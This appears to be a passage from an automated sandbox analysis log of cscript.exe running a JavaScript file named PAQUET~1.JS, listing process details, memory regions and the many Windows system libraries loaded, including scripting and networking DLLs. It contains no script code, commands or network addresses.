# Flog Txt Version 1 # Analyzer Version: 2.3.0 # Analyzer Build Date: Apr 12 2018 14:32:59 # Log Creation Date: 02.05.2018 13:26:09.919 Process: id = "1" image_name = "cscript.exe" filename = "c:\\windows\\system32\\cscript.exe" page_root = "0x1a7c3000" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\PAQUET~1.JS\" " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2 start_va = 0x92e5460000 end_va = 0x92e547ffff entry_point = 0x0 region_type = private name = "private_0x00000092e5460000" filename = "" Region: id = 3 start_va = 0x92e5480000 end_va = 0x92e5493fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5480000" filename = "" Region: id = 4 start_va = 0x92e54a0000 end_va = 0x92e559ffff entry_point = 0x0 region_type = private name = "private_0x00000092e54a0000" filename = "" Region: id = 5 start_va = 0x92e55a0000 end_va = 0x92e55a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e55a0000" filename = "" Region: id = 6 start_va = 0x92e55b0000 end_va = 0x92e55b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e55b0000" filename = "" Region: id = 7 start_va = 0x92e55c0000 end_va = 0x92e55c1fff entry_point = 0x0 region_type = private name = "private_0x00000092e55c0000" filename = "" Region: id = 8 start_va = 0x7df5ff080000 end_va = 0x7ff5ff07ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff080000" filename = "" Region: id = 9 start_va = 0x7ff7ebd60000 end_va = 0x7ff7ebd82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7ebd60000" filename = "" Region: id = 10 start_va = 0x7ff7ebd8d000 end_va = 0x7ff7ebd8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd8d000" filename = "" Region: id = 11 start_va = 0x7ff7ebd8e000 end_va = 0x7ff7ebd8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd8e000" filename = "" Region: id = 12 start_va = 0x7ff7ecad0000 end_va = 0x7ff7ecafefff entry_point = 0x7ff7ecad0000 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 13 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 160 start_va = 0x92e55f0000 end_va = 0x92e56effff entry_point = 0x0 region_type = private name = "private_0x00000092e55f0000" filename = "" Region: id = 161 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 162 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 237 start_va = 0x92e5460000 end_va = 0x92e546ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5460000" filename = "" Region: id = 238 start_va = 0x92e5470000 end_va = 0x92e5476fff entry_point = 0x0 region_type = private name = "private_0x00000092e5470000" filename = "" Region: id = 239 start_va = 0x92e56f0000 end_va = 0x92e57adfff entry_point = 0x92e56f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 240 start_va = 0x92e57b0000 end_va = 0x92e58affff entry_point = 0x0 region_type = private name = "private_0x00000092e57b0000" filename = "" Region: id = 241 start_va = 0x7ff7ebc60000 end_va = 0x7ff7ebd5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7ebc60000" filename = "" Region: id = 242 start_va = 0x7ff7ebd8b000 end_va = 0x7ff7ebd8cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd8b000" filename = "" Region: id = 243 start_va = 0x7ffbfb2c0000 end_va = 0x7ffbfb2c9fff entry_point = 0x7ffbfb2c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 244 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 245 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 246 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 247 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 248 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 249 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 250 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 251 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 252 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 253 start_va = 0x92e55d0000 end_va = 0x92e55d6fff entry_point = 0x0 region_type = private name = "private_0x00000092e55d0000" filename = "" Region: id = 254 start_va = 0x92e5930000 end_va = 0x92e593ffff entry_point = 0x0 region_type = private name = "private_0x00000092e5930000" filename = "" Region: id = 255 start_va = 0x92e5940000 end_va = 0x92e5ac7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5940000" filename = "" Region: id = 256 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 257 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 258 start_va = 0x92e55e0000 end_va = 0x92e55e2fff entry_point = 0x92e55e0000 region_type = mapped_file name = "cscript.exe.mui" filename = "\\Windows\\System32\\en-US\\cscript.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cscript.exe.mui") Region: id = 259 start_va = 0x92e58b0000 end_va = 0x92e58b0fff entry_point = 0x0 region_type = private name = "private_0x00000092e58b0000" filename = "" Region: id = 260 start_va = 0x92e58c0000 end_va = 0x92e58c0fff entry_point = 0x0 region_type = private name = "private_0x00000092e58c0000" filename = "" Region: id = 261 start_va = 0x92e5ad0000 end_va = 0x92e5c50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5ad0000" filename = "" Region: id = 262 start_va = 0x92e5c60000 end_va = 0x92e705ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5c60000" filename = "" Region: id = 263 start_va = 0x92e7060000 end_va = 0x92e7135fff entry_point = 0x92e7060000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 264 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 265 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 266 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 267 start_va = 0x92e58d0000 end_va = 0x92e58effff entry_point = 0x0 region_type = private name = "private_0x00000092e58d0000" filename = "" Region: id = 268 start_va = 0x92e7060000 end_va = 0x92e7396fff entry_point = 0x92e7060000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 269 start_va = 0x92e58d0000 end_va = 0x92e58d8fff entry_point = 0x92e58d0000 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 270 start_va = 0x92e58e0000 end_va = 0x92e58effff entry_point = 0x0 region_type = private name = "private_0x00000092e58e0000" filename = "" Region: id = 271 start_va = 0x7ffc00760000 end_va = 0x7ffc007f7fff entry_point = 0x7ffc00760000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 272 start_va = 0x92e73a0000 end_va = 0x92e749ffff entry_point = 0x0 region_type = private name = "private_0x00000092e73a0000" filename = "" Region: id = 273 start_va = 0x7ff7ebd89000 end_va = 0x7ff7ebd8afff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd89000" filename = "" Region: id = 274 start_va = 0x92e58f0000 end_va = 0x92e58f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e58f0000" filename = "" Region: id = 275 start_va = 0x92e74a0000 end_va = 0x92e7557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e74a0000" filename = "" Region: id = 276 start_va = 0x92e58f0000 end_va = 0x92e58f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e58f0000" filename = "" Region: id = 277 start_va = 0x7ffbfe9a0000 end_va = 0x7ffbfe9c1fff entry_point = 0x7ffbfe9a0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 278 start_va = 0x92e5900000 end_va = 0x92e5900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5900000" filename = "" Region: id = 279 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 280 start_va = 0x92e5910000 end_va = 0x92e5910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5910000" filename = "" Region: id = 281 start_va = 0x7ffbed430000 end_va = 0x7ffbed4fdfff entry_point = 0x7ffbed430000 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 282 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 283 start_va = 0x7ffbf69d0000 end_va = 0x7ffbf69dffff entry_point = 0x7ffbf69d0000 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 284 start_va = 0x7ffbed410000 end_va = 0x7ffbed42cfff entry_point = 0x7ffbed410000 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 285 start_va = 0x92e5920000 end_va = 0x92e5920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5920000" filename = "" Region: id = 286 start_va = 0x7ffbf39b0000 end_va = 0x7ffbf39bffff entry_point = 0x7ffbf39b0000 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 287 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 290 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 291 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 292 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 293 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 294 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 295 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 296 start_va = 0x92e5920000 end_va = 0x92e5920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e5920000" filename = "" Region: id = 297 start_va = 0x92e7560000 end_va = 0x92e765ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7560000" filename = "" Region: id = 298 start_va = 0x7ff7ebd87000 end_va = 0x7ff7ebd88fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd87000" filename = "" Region: id = 299 start_va = 0x7ffbf69c0000 end_va = 0x7ffbf69cbfff entry_point = 0x7ffbf69c0000 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 300 start_va = 0x7ffc03b40000 end_va = 0x7ffc03baefff entry_point = 0x7ffc03b40000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 301 start_va = 0x92e7660000 end_va = 0x92e865ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e7660000" filename = "" Region: id = 302 start_va = 0x92e8660000 end_va = 0x92e8660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e8660000" filename = "" Region: id = 303 start_va = 0x92e7660000 end_va = 0x92e775ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7660000" filename = "" Region: id = 304 start_va = 0x7ff7ebd85000 end_va = 0x7ff7ebd86fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd85000" filename = "" Region: id = 305 start_va = 0x7ffbed3f0000 end_va = 0x7ffbed40cfff entry_point = 0x7ffbed3f0000 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 306 start_va = 0x7ffbec230000 end_va = 0x7ffbec2d9fff entry_point = 0x7ffbec230000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 307 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 308 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 309 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 310 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 311 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 312 start_va = 0x92e7760000 end_va = 0x92e77dffff entry_point = 0x0 region_type = private name = "private_0x00000092e7760000" filename = "" Region: id = 313 start_va = 0x92e7760000 end_va = 0x92e7766fff entry_point = 0x0 region_type = private name = "private_0x00000092e7760000" filename = "" Region: id = 314 start_va = 0x92e77d0000 end_va = 0x92e77dffff entry_point = 0x0 region_type = private name = "private_0x00000092e77d0000" filename = "" Region: id = 315 start_va = 0x7ffbed3a0000 end_va = 0x7ffbed3e3fff entry_point = 0x7ffbed3a0000 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll") Region: id = 316 start_va = 0x92e5920000 end_va = 0x92e592ffff entry_point = 0x0 region_type = private name = "private_0x00000092e5920000" filename = "" Region: id = 317 start_va = 0x92e77e0000 end_va = 0x92e78dffff entry_point = 0x0 region_type = private name = "private_0x00000092e77e0000" filename = "" Region: id = 318 start_va = 0x92e78e0000 end_va = 0x92e79dffff entry_point = 0x0 region_type = private name = "private_0x00000092e78e0000" filename = "" Region: id = 319 start_va = 0x92e79e0000 end_va = 0x92e7adffff entry_point = 0x0 region_type = private name = "private_0x00000092e79e0000" filename = "" Region: id = 320 start_va = 0x7ff7ebc5e000 end_va = 0x7ff7ebc5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebc5e000" filename = "" Region: id = 321 start_va = 0x7ff7ebd83000 end_va = 0x7ff7ebd84fff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebd83000" filename = "" Region: id = 322 start_va = 0x92e7770000 end_va = 0x92e7772fff entry_point = 0x92e7770000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 323 start_va = 0x92e7780000 end_va = 0x92e7788fff entry_point = 0x92e7780000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 324 start_va = 0x92e7ae0000 end_va = 0x92e7bdffff entry_point = 0x0 region_type = private name = "private_0x00000092e7ae0000" filename = "" Region: id = 325 start_va = 0x7ff7ebc5c000 end_va = 0x7ff7ebc5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7ebc5c000" filename = "" Region: id = 326 start_va = 0x92e7770000 end_va = 0x92e7772fff entry_point = 0x92e7770000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 327 start_va = 0x92e7780000 end_va = 0x92e7788fff entry_point = 0x92e7780000 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 328 start_va = 0x7ffbec200000 end_va = 0x7ffbec228fff entry_point = 0x7ffbec200000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 329 start_va = 0x7ffbec1c0000 end_va = 0x7ffbec1f4fff entry_point = 0x7ffbec1c0000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 330 start_va = 0x7ffbffad0000 end_va = 0x7ffbffaebfff entry_point = 0x7ffbffad0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 331 start_va = 0x92e7770000 end_va = 0x92e7782fff entry_point = 0x92e7770000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 332 start_va = 0x92e7790000 end_va = 0x92e779ffff entry_point = 0x92e7790000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 333 start_va = 0x7ffbebc10000 end_va = 0x7ffbebe46fff entry_point = 0x7ffbebc10000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 334 start_va = 0x92e7be0000 end_va = 0x92e7d6ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7be0000" filename = "" Region: id = 335 start_va = 0x92e7d70000 end_va = 0x92e7f5ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7d70000" filename = "" Region: id = 336 start_va = 0x92e7d70000 end_va = 0x92e7efffff entry_point = 0x0 region_type = private name = "private_0x00000092e7d70000" filename = "" Region: id = 337 start_va = 0x92e7f50000 end_va = 0x92e7f5ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7f50000" filename = "" Region: id = 338 start_va = 0x92e7be0000 end_va = 0x92e7d1ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7be0000" filename = "" Region: id = 339 start_va = 0x92e7d60000 end_va = 0x92e7d6ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7d60000" filename = "" Region: id = 340 start_va = 0x92e7be0000 end_va = 0x92e7ceffff entry_point = 0x0 region_type = private name = "private_0x00000092e7be0000" filename = "" Region: id = 341 start_va = 0x92e7d10000 end_va = 0x92e7d1ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7d10000" filename = "" Region: id = 342 start_va = 0x92e7be0000 end_va = 0x92e7cbefff entry_point = 0x92e7be0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 343 start_va = 0x92e7ce0000 end_va = 0x92e7ceffff entry_point = 0x0 region_type = private name = "private_0x00000092e7ce0000" filename = "" Region: id = 344 start_va = 0x92e7f60000 end_va = 0x92e835ffff entry_point = 0x0 region_type = private name = "private_0x00000092e7f60000" filename = "" Region: id = 345 start_va = 0x92e77a0000 end_va = 0x92e77a0fff entry_point = 0x92e77a0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 346 start_va = 0x7ffbeb800000 end_va = 0x7ffbeb936fff entry_point = 0x7ffbeb800000 region_type = mapped_file name = "msado15.dll" filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll") Region: id = 347 start_va = 0x7ffbeb7d0000 end_va = 0x7ffbeb7f4fff entry_point = 0x7ffbeb7d0000 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 348 start_va = 0x7ffbf6fc0000 end_va = 0x7ffbf7156fff entry_point = 0x7ffbf6fc0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 351 start_va = 0x7ffbf9380000 end_va = 0x7ffbf96f5fff entry_point = 0x7ffbf9380000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 352 start_va = 0x7ffbf5c50000 end_va = 0x7ffbf5ef6fff entry_point = 0x7ffbf5c50000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 353 start_va = 0x7ffbedf30000 end_va = 0x7ffbedf6cfff entry_point = 0x7ffbedf30000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 354 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 355 start_va = 0x92e77b0000 end_va = 0x92e77b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000092e77b0000" filename = "" Region: id = 356 start_va = 0x92e77c0000 end_va = 0x92e77c0fff entry_point = 0x92e77c0000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 357 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 358 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 359 start_va = 0x7ffbf9250000 end_va = 0x7ffbf9264fff entry_point = 0x7ffbf9250000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 360 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 361 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 362 start_va = 0x7ffbfbb40000 end_va = 0x7ffbfbc15fff entry_point = 0x7ffbfbb40000 region_type = mapped_file name = "winhttp.dll" filename = 